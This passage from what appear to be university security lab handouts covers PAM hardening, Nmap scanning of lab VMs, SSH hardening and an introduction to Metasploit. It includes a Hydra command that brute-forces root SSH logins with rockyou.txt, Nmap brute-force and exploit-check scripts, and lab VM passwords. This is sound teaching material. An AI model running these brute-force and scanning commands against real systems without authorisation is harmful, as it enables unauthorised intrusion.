- Example use: When logging in through the terminal or a graphical login manager, this file is consulted to verify if the user provided the correct credentials.

2. common-password

This configuration is responsible for password management. It defines the rules for password changes, including whether passwords must be strong or whether password history should be checked to avoid reuse of old passwords.

- Example use: When a user changes their password using the passwd command, the rules defined in this file ensure that the password meets system policies.

3. common-session

This file manages session-related tasks after authentication. It often includes session cleanup and initialization tasks, such as mounting user directories or logging user sessions. It’s executed after the user is successfully authenticated but before they gain access to a session.

Other common-* files, such as common-account, follow the same pattern.

Task 1: Basic PAM Configuration for Authentication

We will start by modifying PAM to enhance security using a simple password policy for the system’s login service.

Back Up PAM Configuration:

It’s always good practice to back up the current PAM configuration files before making any changes.

Create a backup of the common-auth and login files:

sudo cp /etc/pam.d/common-auth /etc/pam.d/common-auth.bak

- This command copies the common-auth file to a backup file named common-auth.bak. The sudo command is used because modifying system files typically requires administrative privileges.

sudo cp /etc/pam.d/login /etc/pam.d/login.bak

- Similarly, this command copies the login file to a backup file named login.bak. The backup ensures that if any changes are made to the original login file, you can revert back to the previous configuration using the backup.

Understanding the common-auth File:

The /etc/pam.d/common-auth file handles authentication for all PAM-enabled services.

View the contents of common-auth:

cat /etc/pam.d/common-auth

You will see lines like:

auth required pam_unix.so

- This means that the PAM auth phase uses the pam_unix.so module to authenticate users via standard Unix password-based authentication.

- Skim through the rest of the file to see which other modules are listed.
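To make the line format concrete, here is a minimal sketch that splits a simple PAM rule into its four parts (type, control flag, module, arguments). The names PamRule and parse_pam_line are invented for this example, and the parser deliberately does not handle bracketed controls such as [success=1 default=ignore], which contain spaces.

```python
from typing import NamedTuple

class PamRule(NamedTuple):
    kind: str      # auth, account, password, or session
    control: str   # e.g. required, requisite
    module: str    # e.g. pam_unix.so
    args: list     # remaining module arguments

def parse_pam_line(line: str):
    """Parse a simple 'type control module [args]' line; None for blanks and comments."""
    stripped = line.split("#", 1)[0].strip()
    if not stripped:
        return None
    fields = stripped.split()
    if len(fields) < 3:
        return None
    return PamRule(fields[0], fields[1], fields[2], fields[3:])

print(parse_pam_line("auth required pam_unix.so"))
```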

List of PAM modules (for reference)

| PAM Module | Description |
|---|---|
| pam_unix.so | Provides traditional UNIX authentication (e.g., checking passwords against /etc/passwd or /etc/shadow). |
| pam_deny.so | Always denies access, often used as a safety measure at the end of configuration files. |
| pam_permit.so | Always allows access. It is sometimes used as a placeholder or to simplify testing. |
| pam_tally2.so | Keeps track of login attempts and can lock out users after a specific number of failures. |
| pam_env.so | Sets and unsets environment variables based on configuration files. |
| pam_faildelay.so | Introduces a delay on authentication failure to slow down brute-force attacks. |
| pam_limits.so | Enforces resource limits, such as file size, CPU usage, or number of processes per user. |
| pam_motd.so | Displays the message of the day (MOTD) upon login. |
| pam_nologin.so | Prevents non-root users from logging in when the /etc/nologin file exists. |
| pam_rootok.so | Bypasses authentication if the user is root (UID 0). |
| pam_securetty.so | Restricts root logins to terminals listed in the /etc/securetty file. |
| pam_succeed_if.so | Allows or denies access based on specific user attributes, such as group membership. |
| pam_tty_audit.so | Enables or disables TTY auditing for the specified users. |
| pam_userdb.so | Allows user authentication based on a custom Berkeley DB. |
| pam_wheel.so | Restricts the use of su to users in the wheel group. |
| pam_cracklib.so | Enforces password strength policies by checking password quality. |
| pam_pwhistory.so | Prevents users from reusing old passwords by keeping a history of previous passwords. |
| pam_exec.so | Executes an external command and acts based on the return value of the command. |
| pam_ldap.so | Allows authentication using an LDAP directory. |
| pam_radius.so | Allows authentication using a RADIUS server. |
| pam_google_authenticator.so | Integrates Google Authenticator for two-factor authentication. |
| pam_systemd.so | Initializes systemd user sessions for processes like managing user logins and sessions. |

Task 2: Implementing Password Complexity Rules

You can enforce password complexity by using the pam_pwquality module, which enforces password policies such as minimum length and character variety.

Open the common-password File:

This file is used to manage password requirements. Open it using a text editor:

sudo nano /etc/pam.d/common-password

Add a Password Policy Using pam_pwquality:

Find the line that uses pam_unix.so and add the pam_pwquality.so line before the pam_unix.so line in your file. This ensures that the password quality is checked before the standard password processing.

The new line should look something like this:

password required pam_pwquality.so retry=3 minlen=12 difok=3 ucredit=-1 lcredit=-1 dcredit=-1 ocredit=-1

Explanation:

- retry=3: Prompts the user up to 3 times for an acceptable password before returning an error.

- minlen=12: Requires a minimum password length of 12 characters.

- difok=3: Requires at least 3 characters in the new password that are not present in the old one.

- ucredit=-1: Requires at least one uppercase letter.

- lcredit=-1: Requires at least one lowercase letter.

- dcredit=-1: Requires at least one digit.

- ocredit=-1: Requires at least one special character.
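The sketch below approximates the character-class and length rules from the line above so you can predict which passwords should be rejected. It is an illustration only, not the algorithm pam_pwquality uses (the real module also applies dictionary and similarity checks), and the function name policy_violations is hypothetical.

```python
import string

def policy_violations(password: str, minlen: int = 12) -> list:
    """Return a list of rule violations; an empty list means the password passes."""
    problems = []
    if len(password) < minlen:
        problems.append(f"shorter than {minlen} characters")
    if not any(c.isupper() for c in password):
        problems.append("no uppercase letter")
    if not any(c.islower() for c in password):
        problems.append("no lowercase letter")
    if not any(c.isdigit() for c in password):
        problems.append("no digit")
    if not any(c in string.punctuation for c in password):
        problems.append("no special character")
    return problems

print(policy_violations("password123"))
print(policy_violations("Tr1cky-Passphrase!"))
```

The first call reports three violations (length, uppercase, special character); the second returns an empty list.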

Save the Changes:

Press Ctrl + X to exit, then Y to confirm the save, and hit Enter.

In PAM, control flags determine how authentication failures are handled. The table below compares two commonly used control flags: requisite and required.

| Control Flag | Behavior on Failure | Modules Processed After Failure? | Use Case |
|---|---|---|---|
| requisite | Immediate failure | No | Stop further processing upon failure. |
| required | Failure is recorded | Yes | Continue processing to the next one, but authentication fails if any required module fails. |
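The difference between the two flags can be sketched as a tiny simulation. This models only required and requisite as described in the table (other flags such as sufficient and optional are left out), and run_stack is a made-up name.

```python
def run_stack(rules):
    """rules: list of (control, module_succeeded) pairs, evaluated top to bottom.

    Returns (overall_success, number_of_modules_run).
    """
    failed = False
    modules_run = 0
    for control, ok in rules:
        modules_run += 1
        if ok:
            continue
        failed = True
        if control == "requisite":
            break  # stop immediately; later modules never run
        # "required": remember the failure but keep going
    return (not failed, modules_run)

print(run_stack([("required", False), ("required", True)]))   # (False, 2)
print(run_stack([("requisite", False), ("required", True)]))  # (False, 1)
```

Both stacks fail overall, but only the required stack still runs the second module.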

Task 3: Enforcing Account Lockout on Failed Login Attempts

Next, we’ll configure PAM to lock a user account after a certain number of failed login attempts using the pam_tally2 or pam_faillock module, depending on the Linux distribution.

For pam_tally2:

Modify the common-auth File:

Add the following line to /etc/pam.d/common-auth to enable the account lockout policy:

auth required pam_tally2.so deny=5 unlock_time=120 onerr=fail audit

Explanation:

- deny=5: Locks the account after 5 failed login attempts.

- unlock_time=120: Automatically unlocks the account after 120 seconds (2 minutes).

- onerr=fail: Denies access in case of a system error.

- audit: Logs the user name to the system log if the user is not found.

Modify the common-account File:

Add the following line to the /etc/pam.d/common-account file:

account required pam_tally2.so

The account required pam_tally2.so line is necessary so that the account phase of PAM also consults the tally; this is the phase in which the counter is reset after a successful login. Together with the auth line, it enforces the lockout policy and adds an extra layer of protection against unauthorized access.
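To reason about deny and unlock_time before testing on a real system, the following simplified model may help. It follows this lab's description of the behaviour (lock after deny failures, unlock after unlock_time seconds) rather than the module's exact internal accounting, and the class name LockoutCounter is hypothetical. Time is passed in explicitly so the logic is easy to test.

```python
class LockoutCounter:
    """Toy model of a failed-login tally with a timed unlock."""

    def __init__(self, deny=5, unlock_time=120):
        self.deny = deny
        self.unlock_time = unlock_time
        self.failures = 0
        self.last_failure = None

    def is_locked(self, now):
        if self.failures < self.deny:
            return False
        # Locked until unlock_time seconds have passed since the last failure.
        return (now - self.last_failure) < self.unlock_time

    def record_failure(self, now):
        self.failures += 1
        self.last_failure = now

    def record_success(self, now):
        if not self.is_locked(now):
            self.failures = 0  # a successful login clears the tally

counter = LockoutCounter(deny=5, unlock_time=120)
for second in range(5):
    counter.record_failure(second)
print(counter.is_locked(10))   # True
print(counter.is_locked(124))  # False
```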

For pam_faillock (Alternative to pam_tally2):

Open the login File:

If you are using a newer Linux distribution that uses pam_faillock, edit the /etc/pam.d/login file:

sudo nano /etc/pam.d/login

Add the Following Lines:

Insert the following lines to configure pam_faillock:

auth required pam_faillock.so preauth silent deny=5 unlock_time=600

auth required pam_faillock.so authfail deny=5 unlock_time=600

account required pam_faillock.so

Explanation:

- The parameters are similar to those of pam_tally2, but pam_faillock is used to enforce the login attempt policy. Here unlock_time=600 unlocks the account after 600 seconds (10 minutes).

Task 4: Testing PAM Configuration

After configuring PAM, it’s crucial to test that the changes are working as expected.

Testing Password Complexity:

Try changing the password of a user (pick one, e.g., csf_vm1, luke, or vader) to one that doesn’t meet the new password policy:

passwd csf_vm1

Enter a password that is too simple (e.g., password123) and PAM should reject it due to not meeting the complexity requirements.

Testing Account Lockout:

Try logging in with incorrect credentials five times in a row to trigger the account lockout:

su spock

After five failed attempts, the account should be locked, and you will not be able to log in.

Checking the Lock Status:

Use the pam_tally2 command (or the faillock command on systems that use pam_faillock) to check the lock status of the account, substituting the user name you tested with:

pam_tally2 --user=csf_vm1

You should see the tally of failed login attempts.

Unlocking the Account (if locked):

To manually unlock the account, use:

pam_tally2 --user=csf_vm1 --reset


Lab Title: Vulnerability Assessment with Nmap on a Multi-VM Setup

Lab Setup

Virtual Machines:

- Admin Machine: Kali Linux (password: kalivm1). This will be used to probe the other machines below.

- Robot Machine: No specific configurations (standard setup)

- Victim Machine: No specific configurations (standard setup)

- IoT_raspberry_Pi Machine: A virtual IoT Raspberry Pi device (standard setup)

Please deploy all of them, one after the other (or all at the same time: select all, then open). It will take about 5 minutes for all of them to be deployed.

Part 1: Setting up the NAT Network in VirtualBox

To allow communication between all four VMs (Admin, Robot, Victim, IoT_raspberry_Pi), we will create a NAT network.

Step 1: Create a New NAT Network in VirtualBox (see images below)

- Open VirtualBox.

- From the top menu, select File > Host Network Manager.

- In the window that appears, switch to the NAT Networks tab.

- Click the Create button (located on the right side) to create a new NAT network.

- Once created, select the network and click on the Properties button to adjust the following:

  - Network Name: Set a custom name, e.g., MyNATNetwork.

  - Network CIDR: Set the IP range to something like 192.168.15.0/24.

  - Enable DHCP: Ensure this is checked so that IP addresses will be automatically assigned to your VMs.

- Click OK to save the settings.

Part 2: Running Nmap Commands

The Admin Machine will be used to perform the vulnerability assessment using Nmap against the Victim Machine and other VMs. This part will introduce several Nmap commands to discover hosts, services, and vulnerabilities on the target machines.

Step 1: Basic Host Discovery with Nmap

Start by discovering active hosts within the network. We will scan the IP range of the NAT network to identify which machines are online.

Command:

nmap -sn 192.168.15.0/24

- Explanation: This command performs a ping scan (-sn), which checks which hosts in the given range (e.g., 192.168.15.0/24) are online (connected to the network) without scanning their ports.

- Expected Output: A list of active hosts in the NAT network, including the IP addresses of the Victim, Robot, and IoT machines.
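If the /24 notation is unfamiliar, the short sketch below uses Python's standard ipaddress module to show how many addresses the example range 192.168.15.0/24 spans and which of them are usable host addresses.

```python
import ipaddress

network = ipaddress.ip_network("192.168.15.0/24")
hosts = list(network.hosts())

print(network.num_addresses)  # 256
print(len(hosts))             # 254
print(hosts[0], hosts[-1])    # 192.168.15.1 192.168.15.254
```

The two addresses excluded from hosts() are the network address (.0) and the broadcast address (.255).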

Questions:

- What are some limitations of using a ping scan for host discovery?

- How can firewalls or IDS/IPS systems affect the results of a ping scan?

Step 2: Service and Version Detection

Now that we've discovered active hosts, let’s perform a service scan to detect open ports and services running on the Victim Machine.

Command:

nmap -sV 192.168.15.X

(Replace 192.168.15.X with the actual IP of the Victim Machine.)

- Explanation: The -sV flag enables version detection, which attempts to determine the versions of services running on open ports.

- Expected Output: A list of open ports, services, and their versions on the Victim Machine.

Questions:

- Why is it important to detect service versions when performing a vulnerability assessment?

- What could happen if Nmap incorrectly identifies a service version? How can you mitigate this risk?

Step 3: OS Detection

To assess potential vulnerabilities, it's crucial to know the operating system running on the Victim Machine.

Command:

nmap -O 192.168.15.X

(Replace 192.168.15.X with the actual IP of the Victim Machine.)

- Explanation: The -O flag enables OS detection, which attempts to guess the operating system of the target based on fingerprinting.

- Expected Output: The OS running on the Victim Machine, along with a confidence level.

Questions:

- How accurate is Nmap’s OS detection? What factors can influence its accuracy?

- Why is identifying the operating system of a target crucial in penetration testing or vulnerability assessments?

Step 4: Aggressive Scan (Combining Multiple Scans)

For a more in-depth assessment, you can perform an aggressive scan that combines several scans: OS detection, service version detection, traceroute, and a script scan using Nmap's default scripts.

Command:

nmap -A 192.168.15.X

(Replace 192.168.15.X with the actual IP of the Victim Machine.)

- Explanation: The -A flag enables aggressive mode, which combines OS detection, version detection, script scanning, and traceroute.

- Expected Output: Detailed information on services, operating system, and traceroute, plus default script results that may hint at potential vulnerabilities.

Questions:

- Why is the aggressive scan useful in certain scenarios? When might it be inappropriate to use this option?

- How might using an aggressive scan increase the risk of detection by the target machine?

Step 5: Scanning Specific Ports

Sometimes, you may want to scan only specific ports (e.g., common web ports like 80 and 443).

Command:

nmap -p 80,443 192.168.15.X

(Replace 192.168.15.X with the actual IP of the Victim Machine.)

- Explanation: The -p flag specifies the ports to scan (in this case, ports 80 and 443).

- Expected Output: The status of the specified ports on the Victim Machine.
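To see what "checking a port" means at the socket level, here is a minimal sketch of a full TCP connect check using Python's standard socket module. It is not how Nmap is implemented, and port_is_open is a name made up for this example. Only run it against machines in your own lab network.

```python
import socket

def port_is_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Attempt a full TCP connection; True means something accepted it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        # connect_ex returns 0 on success and an error code otherwise.
        return sock.connect_ex((host, port)) == 0

# Example usage (replace the address with your Victim Machine's IP):
# for port in (80, 443):
#     print(port, port_is_open("192.168.15.X", port))
```

A check like this cannot distinguish a closed port from one silently dropped by a firewall, which is one reason Nmap reports a separate filtered state.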

Questions:

- Why might you want to focus on scanning specific ports rather than all ports?

- What are the potential risks of scanning only a limited number of ports during an assessment?

Step 6: Scanning for Vulnerabilities with Nmap Scripts

Nmap has a scripting engine (NSE) that allows you to run scripts to detect specific vulnerabilities.

Command:

nmap --script vuln 192.168.15.X

(Replace 192.168.15.X with the actual IP of the Victim Machine.)

- Explanation: The --script vuln option runs vulnerability detection scripts to check for common vulnerabilities.

- Expected Output: A report of potential vulnerabilities on the Victim Machine.

Questions:

- What is the purpose of Nmap’s scripting engine, and how can it be expanded?

- Why is it important to verify the results of a script-based vulnerability scan with other tools or manual analysis?

Nmap Scripts

| Category | Script Name | Description | Command Example |

|---|---|---|---|

| Vulnerability Detection | vuln | Runs various vulnerability detection scripts | nmap --script vuln <target_IP> |

| Vulnerability Detection | ssl-heartbleed | Checks for the Heartbleed vulnerability in SSL | nmap --script ssl-heartbleed <target_IP> |

| Vulnerability Detection | http-shellshock | Checks for the Shellshock vulnerability in HTTP servers | nmap --script http-shellshock <target_IP> |

| Vulnerability Detection | http-dombased-xss | Checks for DOM-based cross-site scripting vulnerabilities | nmap --script http-dombased-xss <target_IP> |

| Vulnerability Detection | ftp-vsftpd-backdoor | Checks for a backdoor in the vsFTPd service | nmap --script ftp-vsftpd-backdoor <target_IP> |

| Vulnerability Detection | smb-vuln-ms17-010 | Checks for SMB vulnerabilities related to EternalBlue | nmap --script smb-vuln-ms17-010 <target_IP> |

| Information Gathering | banner | Retrieves banner information from services | nmap --script banner <target_IP> |

| Information Gathering | http-title | Retrieves the title of web pages | nmap --script http-title <target_IP> |

| Information Gathering | dns-brute | Performs DNS brute-forcing to enumerate subdomains | nmap --script dns-brute <target_IP> |

| Information Gathering | ssh-hostkey | Retrieves the SSH host key | nmap --script ssh-hostkey <target_IP> |

| Information Gathering | smtp-commands | Lists supported SMTP commands | nmap --script smtp-commands <target_IP> |

| Authentication Bypass/Weakness | ftp-anon | Checks if anonymous FTP login is allowed | nmap --script ftp-anon <target_IP> |

| Authentication Bypass/Weakness | smb-enum-shares | Lists SMB shares without authentication | nmap --script smb-enum-shares <target_IP> |

| Authentication Bypass/Weakness | smb-enum-users | Enumerates SMB users | nmap --script smb-enum-users <target_IP> |

| Password Auditing | http-brute | Performs HTTP brute-force password auditing | nmap --script http-brute <target_IP> |

| Password Auditing | ssh-brute | Performs SSH brute-force password auditing | nmap --script ssh-brute <target_IP> |

| Password Auditing | ftp-brute | Performs FTP brute-force password auditing | nmap --script ftp-brute <target_IP> |

| Exploit Checking | smb-vuln-cve-2017-7494 | Checks for vulnerabilities related to Samba (CVE-2017-7494) | nmap --script smb-vuln-cve-2017-7494 <target_IP> |

| Exploit Checking | http-sql-injection | Checks for SQL injection vulnerabilities | nmap --script http-sql-injection <target_IP> |

| Exploit Checking | rdp-vuln-ms12-020 | Checks for RDP vulnerabilities related to MS12-020 | nmap --script rdp-vuln-ms12-020 <target_IP> |

| Service Enumeration | smb-os-discovery | Detects the operating system through SMB | nmap --script smb-os-discovery <target_IP> |

| Service Enumeration | http-methods | Enumerates HTTP methods supported by the web server | nmap --script http-methods <target_IP> |

| Service Enumeration | smtp-enum-users | Enumerates SMTP users | nmap --script smtp-enum-users <target_IP> |

| Malware Detection | malware-host | Attempts to detect if the host is part of a botnet | nmap --script malware-host <target_IP> |

Step 7: Stealth Scan (SYN Scan)

A stealth scan is useful when you want to perform scanning without being easily detected by the target machine.

Command:

nmap -sS 192.168.15.X

(Replace 192.168.15.X with the actual IP of the Victim Machine.)

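- Explanation: The -sS flag performs a SYN scan, which sends a SYN packet and never completes the TCP handshake, making it stealthier than a regular TCP connect scan. It typically requires root privileges (e.g., run it with sudo).

- Expected Output: A list of open ports with minimal interaction with the target machine.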

Questions:

- How does a SYN scan differ from a full TCP scan, and why is it considered stealthy?

- In what scenarios might you want to avoid using a stealth scan?

Step 8: Scan All Ports

To scan all available TCP ports (1-65535) on the Victim Machine:

Command:

nmap -p- 192.168.15.X

(Replace 192.168.15.X with the actual IP of the Victim Machine.)

- Explanation: The -p- flag scans all 65,535 TCP ports.

- Expected Output: A comprehensive report of all open ports on the Victim Machine.

Questions:

- Why is it important to scan all ports in some cases, and what are the trade-offs?

- What security measures could be in place to limit the information gathered from a full port scan?

Step 9: Save Scan Results to a File

To save the output of your scan to a file for future reference:

Command:

nmap -oN scan_results.txt 192.168.15.X

- Explanation: The -oN flag saves the output in normal (human-readable) text format to the named file (scan_results.txt).

- Expected Output: Scan results will be saved to a file named scan_results.txt in your working directory.
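Saved results become more useful once you can extract data from them. The sketch below pulls the port rows out of normal-format output with a regular expression. The sample text is illustrative rather than taken from a real scan, parse_port_lines is a hypothetical helper, and for serious post-processing the XML format (-oX) is usually a better fit.

```python
import re

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_port_lines(text: str) -> list:
    """Extract (port, protocol, state, service, version) from port table rows."""
    rows = []
    for line in text.splitlines():
        match = PORT_LINE.match(line.strip())
        if match:
            port, proto, state, service, version = match.groups()
            rows.append((int(port), proto, state, service, version.strip()))
    return rows

# Illustrative sample, not output from a real scan.
sample = """\
PORT   STATE  SERVICE VERSION
22/tcp open   ssh     OpenSSH 7.6p1
80/tcp closed http
"""

for row in parse_port_lines(sample):
    print(row)
```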

Questions:

- Why is it important to save the results of a vulnerability scan, and how can these results be used later?

- What are the benefits and drawbacks of saving the output in different formats (e.g., normal vs. XML)?

Part-3: SSH Vulnerability Exercises

Exercise 1: Discovering SSH Port and Service

Steps:

- Scan the victim machine (pick any) to check whether the SSH port is open:

nmap -p 22 <victim_IP>

- Perform a service version scan on the SSH port:

nmap -sV -p 22 <victim_IP>

- Questions:

  - Which port is the SSH service running on?

  - What version of SSH is running on the victim machine?

Expected Outcome:

Students should identify port 22 as the default SSH port and the version of the SSH service, e.g., OpenSSH 7.6p1.

Exercise 2: Weak Password Brute-Force Attack Using Hydra

Objective:

Demonstrate how a weak password policy can lead to SSH brute-force attacks.

Steps:

- If you are using your own machine and Hydra is not installed, install it on the attacker machine:

sudo apt-get install hydra

- Use Hydra to brute-force the SSH login:

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://<victim_IP>

- Log in to the victim machine using the cracked credentials:

ssh root@<victim_IP>

- Questions:

  - What steps can be taken to prevent SSH brute-force attacks?

Exercise 3: Identifying and Mitigating Root Login Vulnerability

Objective:

Learn how enabling root login in SSH poses a security risk and how to disable it.

Steps:

- Verify if root login is enabled on the victim machine:

ssh root@<victim_IP>

- Disable root login on the victim machine:

  - Open the SSH configuration file on the victim machine:

sudo nano /etc/ssh/sshd_config

  - Find the line PermitRootLogin yes and change it to:

PermitRootLogin no

  - Restart the SSH service:

sudo systemctl restart ssh

- Questions:

  - Why is root login considered a security risk?

  - How does disabling root login enhance SSH security?

Exercise 4: Enforcing Key-Based SSH Authentication

Objective:

Understand how to set up and enforce key-based SSH authentication to secure SSH access.

Steps: (Similar to Part-3 in Lab-1)

- Generate an SSH key pair on the attacker machine:

ssh-keygen -t rsa

- Copy the public key to the victim machine:

ssh-copy-id <username>@<victim_IP>

- Disable password-based authentication on the victim machine:

sudo nano /etc/ssh/sshd_config

  - Change the following:

PasswordAuthentication no

  - Restart SSH:

sudo systemctl restart ssh

- Questions:

  - What are the advantages of using key-based authentication over passwords?

  - How does disabling password-based authentication prevent brute-force attacks?
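After editing sshd_config in Exercises 3 and 4, it can help to check the two settings programmatically. The sketch below is a simplified audit that assumes a flat configuration (it ignores Match blocks and Include directives); the function names are made up for this example. It keeps the first occurrence of each keyword, since sshd uses the first value it obtains.

```python
def effective_settings(config_text: str) -> dict:
    """Return keyword -> value, keeping the first occurrence of each keyword."""
    settings = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks and commented-out defaults
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        keyword, value = parts[0].lower(), parts[1].strip()
        settings.setdefault(keyword, value)
    return settings

def audit(config_text: str) -> list:
    """Report the two hardening settings from this lab that are not set to 'no'."""
    settings = effective_settings(config_text)
    findings = []
    if settings.get("permitrootlogin", "").lower() != "no":
        findings.append("PermitRootLogin is not set to no")
    if settings.get("passwordauthentication", "").lower() != "no":
        findings.append("PasswordAuthentication is not set to no")
    return findings

print(audit("PermitRootLogin yes\n#PasswordAuthentication no\n"))
```

Note that a commented-out line such as #PasswordAuthentication no has no effect, so the example reports both settings.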

Exercise 5: SSH Configuration Audit Using Nmap Scripts

Use Nmap’s SSH-related scripts to identify vulnerabilities and misconfigurations in the victim’s SSH setup.

Steps:

- Run Nmap's SSH vulnerability check:

nmap --script ssh2-enum-algos,ssh-hostkey -p 22 <victim_IP>

- Analyse the output and identify potential weak algorithms or configurations.

- Questions:

  - What encryption algorithms does the SSH service support?

  - Are any weak or outdated algorithms being used?
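When reviewing the algorithm list, a simple filter can highlight names worth a closer look. The marker list below is an illustrative assumption, not an authoritative standard, so check current hardening guidance before relying on it; flag_weak and the sample offered list are likewise invented for this sketch.

```python
# Illustrative markers only; consult current guidance for an authoritative list.
WEAK_MARKERS = ("arcfour", "3des", "-cbc", "md5", "group1-sha1")

def flag_weak(algorithms):
    """Return the algorithm names that contain any of the weak markers."""
    return [name for name in algorithms if any(m in name for m in WEAK_MARKERS)]

# Hypothetical list of algorithms, standing in for real ssh2-enum-algos output.
offered = [
    "chacha20-poly1305@openssh.com",
    "aes128-ctr",
    "3des-cbc",
    "hmac-md5",
    "diffie-hellman-group1-sha1",
]

print(flag_weak(offered))
```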

Exercise 6: Detecting OpenSSH Vulnerabilities Using Nmap (Similar to Step 6 above from Part 2)

Use Nmap to check for known OpenSSH vulnerabilities on the victim machine.

Steps:

- Run the Nmap vuln script to detect SSH-related vulnerabilities:

nmap --script vuln -p 22 <victim_IP>

- Questions:

  - Were any SSH vulnerabilities detected?

  - How can these vulnerabilities be mitigated?

Exercise 7: Mitigating SSH Port Scanning

Understand how changing the default SSH port or using tools like Fail2Ban can mitigate SSH port scanning and brute-force attacks.

Steps:

- Change the SSH port on the victim machine:

  - Edit the SSH configuration file:

sudo nano /etc/ssh/sshd_config

  - Change the SSH port from 22 to another port, e.g.:

Port 2222

  - Restart SSH:

sudo systemctl restart ssh

- Install and configure Fail2Ban to block repeated failed login attempts:

sudo apt-get install fail2ban

sudo systemctl enable fail2ban

sudo systemctl start fail2ban

- Questions:

  - How does changing the SSH port and using Fail2Ban reduce the likelihood of attacks?

  - What are the limitations of these methods?

Conclusion

By following the steps above, you will have successfully used Nmap to perform various vulnerability assessments on the Victim Machine. You have learned how to:

- Discover hosts and services.

- Detect open ports, operating systems, and service versions.

- Run vulnerability detection scripts.

- Conduct stealth scans.

- Save scan results for reporting purposes.

Each of these techniques is vital for understanding the security posture of a target system, helping to identify potential vulnerabilities and entry points for further investigation.

Part-4: On Your Own Time: GUI-Based Tools for VA

In cybersecurity, vulnerability scanning is a critical process to identify and address security risks in systems before attackers exploit them. Two popular tools used for this purpose are Nessus and OpenVAS. Both are vulnerability scanners that help you detect weaknesses in your systems, but they differ slightly in their functionality and licensing.

1. Nessus

Nessus, developed by Tenable, is a powerful and widely-used commercial vulnerability scanner. It is designed to scan systems, networks, and applications to identify vulnerabilities, misconfigurations, and compliance issues.

- Key Features:

  - Extensive database of known vulnerabilities.

  - Regular updates to stay current with new threats.

  - Supports a wide range of platforms (Windows, Linux, macOS, and more).

  - Generates detailed reports for remediation.

  - Free version available with limited features (Nessus Essentials), suitable for home or lab use.

- Use Cases:

  - Identifying unpatched systems and outdated software.

  - Scanning for known vulnerabilities in servers, routers, and devices.

  - Ensuring compliance with security standards like PCI DSS and HIPAA.

- Why Use Nessus: Nessus is known for its ease of use and comprehensive vulnerability scanning capabilities. If you're looking for a scanner that's user-friendly with a wide range of detection options, Nessus is a great choice, especially in professional environments.

- Installation: Students can download Nessus Essentials for free from Tenable's website, which allows for vulnerability scanning with some restrictions.

Link for Download: Nessus Essentials

2. OpenVAS

OpenVAS (Open Vulnerability Assessment Scanner) is an open-source vulnerability scanner maintained by Greenbone Networks as part of the Greenbone Vulnerability Management (GVM) solution. It's free to use and is often seen as a good alternative to Nessus, especially for users who prefer open-source tools.

- Key Features:

  - Open-source and free to use.

  - Regularly updated vulnerability feed.

  - Supports complex vulnerability scanning of networks and hosts.

  - Includes tools for scanning, vulnerability detection, and reporting.

  - Integrated with GVM, which offers a comprehensive vulnerability management solution.

- Use Cases:

  - Free alternative for scanning systems for known vulnerabilities.

  - Suitable for students, researchers, or companies preferring open-source solutions.

  - Can be integrated into other security tools and workflows.

- Why Use OpenVAS: OpenVAS is widely used in both academic and professional environments due to its flexibility and the fact that it's open-source. While it might require more configuration compared to Nessus, it's perfect for those who want a no-cost option for learning vulnerability scanning.

- Installation: OpenVAS can be installed on various Linux distributions. It's recommended to run OpenVAS on a dedicated virtual machine due to its system requirements.

Link for Installation Instructions: OpenVAS Documentation

Recap of VA and Pen Testing, and Using the Metasploit Framework

Lab Setup

This guide helps you set up a lab environment with two (or more) machines: an admin (pen-tester) and a victim. The admin machine runs Kali Linux, and the victim machine (choose from below) is configured with vulnerable services for exploitation using Metasploit. There is no internet access (unless you use your own machine), so everything is pre-configured and locally available. You can find the VMs in the Week-6 folder.

- Admin Machine (Kali Linux):

  - Username: csf_vm1

  - Password: kalivm1

- Victim Machine(s):

In your week-6 folder, you have multiple victim machines:

  - Meta (22-ish open ports) (I recommend using this one for the lab below and for your assignment)

  - Victim (in case you need the password, it's: victim)

  - MrRobort (in case you fancy doing more, with ports 22, 80, 443)

  - Node (in case you fancy doing more, with ports 22, 3000)

  - Rickdiculously Easy (in case you fancy doing more, with ports 21, 22, 80, 9090)

You need at least one, but they're very lightweight and should be ready in less than 1 minute.

Initial Setup

Ensure that all VMs (admin and meta, or any other VM you might use) are connected to your own NAT network to allow communication between them while isolating the environment from the external network. (Please revisit lab1 and lab4 if you are unsure how to do this.)

Part-1: RECAP of Nmap Commands for Scanning the Victim

You can jump to Part-2 if you're okay with nmap

Task 1: Network Discovery on a /24 Range

Identify active hosts on the network by scanning a /24 subnet.

- Command:

sudo nmap -sn <network_prefix>/24

  - Replace <network_prefix> with your subnet's network address (e.g., 192.168.1.0, giving 192.168.1.0/24).

- Expected Outcome: A list of active IP addresses.

Task 2: Service Enumeration on Discovered Hosts

Identify open ports and services on each discovered host.

- Instructions: Pick one of the live IPs from Task 1 (targeting meta_victim) and scan for open ports.

- Command:

sudo nmap -sV <target_ip>

- Expected Outcome: A list of open ports and services with version information, including typical services on the meta_victim VM, like SSH (port 22) and HTTP (port 80).

Task 3: Conducting an Aggressive Scan

Perform a deeper scan for OS details, service versions, and traceroute information.

- Instructions: Use the -A flag for an aggressive scan.

- Command:

sudo nmap -A <meta_victim_ip>

- Expected Outcome: Detailed output with OS detection, service versions, and traceroute.

Task 4: Vulnerability Scan with Nmap Scripts

Use Nmap’s vulnerability scripts to identify known vulnerabilities on meta_victim.

- Instructions: Use --script vuln to run a selection of vulnerability-detection scripts on meta_victim.

- Command:

sudo nmap --script vuln <meta_victim_ip>

- The --script vuln option runs the scripts in Nmap's vuln category to detect common vulnerabilities, which may include tests for outdated software versions, weak configurations, or exposed sensitive information.

- Expected Outcome: Output detailing any identified vulnerabilities on open ports and services. Look in particular for SSH or HTTP-related vulnerabilities.

Please revisit lab-4 for more scripts



Part-2: Introduction to Metasploit: Basic Commands and Usage

This lab is designed to familiarise you with the Metasploit Framework, its structure, and basic commands. The objective is to help you understand how to navigate Metasploit, use modules, and set up a simple test exploit safely before diving into specific services like FTP or SSH.

1. Understanding Metasploit’s Structure

Metasploit is composed of several key components:

- Exploits: Code used to target vulnerabilities.

- Payloads: Code executed on the target after a successful exploit (e.g., opening a reverse shell).

- Auxiliary Modules: Tools for scanning, brute forcing, and other non-exploit functions.

- Encoders: Used to modify payloads to evade detection by antivirus software.

